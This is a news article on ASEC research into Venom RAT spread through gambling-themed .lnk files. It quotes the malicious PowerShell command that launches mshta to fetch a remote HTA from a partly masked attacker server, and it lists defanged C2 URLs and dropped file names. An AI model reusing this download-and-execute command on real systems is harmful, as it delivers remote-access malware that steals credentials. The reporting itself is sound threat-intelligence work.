Skip to content

Covert RAT malware posing as gambling files compromises systems

  • by
  • 3 min read

A new wave of Remote Access Trojan (RAT) malware is being distributed via the files associated with illegal gambling, compromising user information and performing malicious activities as directed by the threat actors.

Researchers from ASEC exposed this new wave and drew parallels to the distribution technique employed by the VenomRAT, where the malware is disseminated through a deceptive shortcut (.lnk) file, subsequently downloading the RAT directly from HTA.

The nefarious shortcut files harbour a malicious PowerShell command, invoking mshta and initiating the download of the malicious script. The identified PowerShell is as follows:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.*  ‘hxxp://193.***.***[.]253:7287/2.hta.hta’

The attack chain explained. | Source: ASEC

Researchers have confirmed these malicious URLs within the shortcut file:

  • hxxp://193.***.***[.]253:7287/2.hta.hta
  • hxxp://193.***.***[.]253:7287/.hta
  • hxxp://85.209.176[.]158:7287/6.hta

The first URL contains VBS codes within the URL that encapsulate obfuscated legitimate document files and PowerShell commands responsible for downloading the insidious RAT.

Contents of the percent.xlsm file. | Source: ASEC

Upon executing the command, an Excel file is downloaded from hxxp://193.***.***[.]253:7287/percent.xlsm and stored as percent.xlsm within the %APPDATA% folder. This Excel file reveals betting methods, indicating a strategic focus on users interested in gambling.

Subsequently, the command fetches an additional executable file from the URL and saves it as darkss.exe in the %APPDATA% folder. This executable, identified as the Venom RAT malware, not only compromises keylogging and user credentials but also executes various malicious activities under the command of the threat actor.

The researchers discovered the command and control (C2) server associated with this malicious activity at the 193.***.***[.]253:7287, 85.209.176[.]158:7287 URL address.

Additional malicious files discovered by researchers. | Source: ASEC

Researchers found diverse malicious files in the C2 URL, including HTA scripts, decoy document files, and malicious executables.

Worryingly, researchers also discovered additional decoy document files during the investigation containing information about gambling websites and personal details of users. Specifically, Darksoft111.exe and Pandora_cryptered.exe represent the Venom RAT and Pandora hVNC malware, respectively.

Researchers have urged users to employ extra caution and vigilance as the threat actors deploy various tricky ways to distribute malware.

Just last month, it was reported that the threat actors are circulating RemcosRAT via webhards targeting South Korean citizens.

In the News: Critical vulnerability in shim puts Linux systems in jeopardy

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: